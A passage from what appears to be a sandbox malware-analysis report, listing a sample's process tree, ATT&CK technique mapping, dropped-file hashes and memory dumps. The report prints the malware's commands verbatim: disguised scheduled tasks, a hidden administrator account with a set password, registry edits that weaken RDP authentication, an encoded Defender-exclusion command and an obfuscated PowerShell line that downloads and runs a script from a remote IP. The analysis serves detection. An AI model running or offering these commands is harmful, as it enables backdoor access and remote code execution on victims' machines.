      4⤵
      PID:1640
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM" /tr "C:\Windows\System32\sysmon2.bat" /ru "SYSTEM" /sc ONSTART /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5004
  - - C:\Windows\system32\schtasks.exe
      schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM"
      4⤵
      PID:4812

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:512
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM2" /f
  2⤵
  PID:4612
- C:\Windows\system32\schtasks.exe
  schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM2" /f
  2⤵
  PID:832
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn "Intel(R) Ethernet2 Connection 1219-LM2" /tr "C:\Windows\System32\sysmon.bat" /ru "SYSTEM" /sc MINUTE /mo 5 /rl HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:540
- C:\Windows\system32\schtasks.exe
  schtasks /run /tn "Intel(R) Ethernet2 Connection 1219-LM2"
  2⤵
  PID:3468

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Windows\System32\sysmon.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\system32\net.exe
  net user _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ /add
    3⤵
    PID:3324
- C:\Windows\system32\net.exe
  net user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user _BootUEFI_ 123456!!! /active:yes /comment:"A account for booting the computer as uefi mode." /fullname:"_BootUEFI_Hosting_ Host Account"
    3⤵
    PID:5032
- C:\Windows\system32\net.exe
  net localgroup Administrators _BootUEFI_ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators _BootUEFI_ /add
    3⤵
    PID:4532
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1872
- C:\Windows\system32\net.exe
  net localgroup "Remote Desktop Users" _BootUEFI_ /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Remote Desktop Users" _BootUEFI_ /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:1460
- C:\Windows\system32\net.exe
  net localgroup "Users" _BootUEFI_ /delete
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup "Users" _BootUEFI_ /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:2200
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  2⤵
  PID:3076
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\Client" /v fClientDisableUDP /t REG_DWORD /d 1 /f
  2⤵
  PID:2920
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v _BootUEFI_ /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:4332
- C:\Windows\system32\reg.exe
  reg add "HKCU\SOFTWARE\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
  2⤵
  PID:1028
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
  2⤵
  PID:2612
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  2⤵
  PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ep bypass -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "[string] $a = {(eliasneliaseeliasw-eliasObeliasjeeliasct neeliast.weliasebeliasCleliasient).eliasdeliasoeliaswnleliasoeliasaeliasdSeliastreliasieliasneliasg('eliasheliasteliasteliasp:eliaselias/eliaselias/1elias54.9elias0.6elias2.24elias8/wHk4tMu9XpWA/eliasaelias.eliaspeliaseliasselias1eliaselias')}; $b=$a.replace('elias','');$c=iex $b;iex $c"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
44997e03ccf7bc6ebb652ffd2a5a5c6c

SHA1
4b042d7da49ec34c71c6cfd2943a054aa0f383ce

SHA256
341028adf827d7717d26d683a2d8c183694b289cb6a0bf9731396b4b27c8c9e3

SHA512
ee259564ae2cb6ea6bfdb5d20885f589375f30723c8df4add4864e96d47e9bbb808604036ab62f30ff76f5c77f1e920516a58b6584bfc93708d034b447366b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
efb3972489bf8a7d31260fea4ffd7c1f

SHA1
531b252fe18b9a556045852a3cf597fa8e8f6603

SHA256
31cb216e6e9cf6d706698d6a849f018fdebe2fcb6735b2247f0a24908ca0b13e

SHA512
f552d43e5be7ad478f84d4bd9df651c2a7acd5cd011fa0a811065cfccbbb9441bc1a6416024c1f8681848739a03effbd823c87754f47c79c6bbe6db963d0b359

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Temp\Report_Estimiation_SKT_20241112472075939.pdf

Filesize
474KB

MD5
ac71b12197e142df7560b5e943db6d76

SHA1
d5175f5d1a88883739bde929f07a3e3ca364195a

SHA256
3de2bbab33eb3d4b0b6ba03c6951bbccdd4f141916f4ea43f9bb195d67a98a7f

SHA512
de0370a53adfcefbedab09613f0e758195de5348f00d63a287a599a26496e372ade90e9c55624f99bfba7314b56573d2eb4c41b3c2aeda6f57392e40922f2afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qy02fsxx.ngo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1.bat

Filesize
1KB

MD5
5c9f358175096711a267c17e746390b0

SHA1
128cd0e49b74583d33f224362b2381686739fea7

SHA256
33675909e13fd3378b390d5bf3fb31b094a291223bf2735fe79e8751d61f2f04

SHA512
5392fd524121d76e43fad750581871589655ec5bba56d875c85e2a884a3d2fc1c11b818131ebde34e402dd436a47188d074959d6b6c8632ff227a5692f212510

Download Submit
C:\Users\Admin\AppData\Local\Temp\k2.bat

Filesize
358B

MD5
73ee484b95ae517d099384e0b5f2255a

SHA1
4b7c89b03aa4c57267e041b3a8356bdd5490b2aa

SHA256
fb26e69770508af54bb2755f916859f2c912eaae7b8fe83f163f4450b3f34e92

SHA512
d84cb995fcbe214efa1bd9e236dfc3b9530780aa670ad30b5156d62b1659745dd8d6fbe438297aed58517a2fa1bcb987f203c100bb3477cf7efe4f867a8a342d

Download Submit
C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat

Filesize
758B

MD5
fb201872c7fe90f79e250805f0b9f998

SHA1
e79d432eb71986227814e9b3de4a42d1df1aa418

SHA256
75c075cf9d9a7dba88a2ad74df1dd6f92c4033063eac3f66034831a1a049f1ef

SHA512
9927f60456f285b94e8349bc2f1d5c1f145c8ea590fa2d180108bc0f8872b7640ec15cf6837c1458c557b9b9ad325f5787385ab3687d5ff407110c67a57ccff4

Download Submit
C:\Users\Public\documents\id.log

Filesize
78B

MD5
5ff082677482420d4e6ae10b360b0914

SHA1
dd7ef68d3416fc87f8c4ee57b7325a8b42332ad0

SHA256
1036fe2b41a0faa239456bba3ea6ff8cef5dbeb09812e49b8c1d7c4580bb3471

SHA512
65e4e1e781e4b380a519d7039e81794852f91675df897214ba7fe3663350fee9753583ce90002c44db88a32d120dabe7f9ce9c0f0d35a6385cbe7d4141ae4409

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/1424-100-0x00000186AD5B0000-0x00000186AD5CC000-memory.dmp

Filesize
112KB

Download
memory/1424-108-0x00000186AD820000-0x00000186AD82A000-memory.dmp

Filesize
40KB

Download
memory/1424-101-0x00000186AD5D0000-0x00000186AD685000-memory.dmp

Filesize
724KB

Download
memory/1424-102-0x00000186AD360000-0x00000186AD36A000-memory.dmp

Filesize
40KB

Download
memory/1424-103-0x00000186AD7F0000-0x00000186AD80C000-memory.dmp

Filesize
112KB

Download
memory/1424-104-0x00000186AD7D0000-0x00000186AD7DA000-memory.dmp

Filesize
40KB

Download
memory/1424-105-0x00000186AD830000-0x00000186AD84A000-memory.dmp

Filesize
104KB

Download
memory/1424-106-0x00000186AD7E0000-0x00000186AD7E8000-memory.dmp

Filesize
32KB

Download
memory/1424-107-0x00000186AD810000-0x00000186AD816000-memory.dmp

Filesize
24KB

Download
memory/1920-2-0x00007FFE76443000-0x00007FFE76445000-memory.dmp

Filesize
8KB

Download
memory/1920-90-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/1920-69-0x00007FFE76443000-0x00007FFE76445000-memory.dmp

Filesize
8KB

Download
memory/1920-55-0x000001D72C5C0000-0x000001D72C7CA000-memory.dmp

Filesize
2.0MB

Download
memory/1920-54-0x000001D72C230000-0x000001D72C3A6000-memory.dmp

Filesize
1.5MB

Download
memory/1920-138-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/1920-14-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/1920-13-0x00007FFE76440000-0x00007FFE76F01000-memory.dmp

Filesize
10.8MB

Download
memory/1920-9-0x000001D72BCD0000-0x000001D72BCF2000-memory.dmp

Filesize
136KB

Download
memory/1992-134-0x0000025EFD1B0000-0x0000025EFD265000-memory.dmp

Filesize
724KB

Download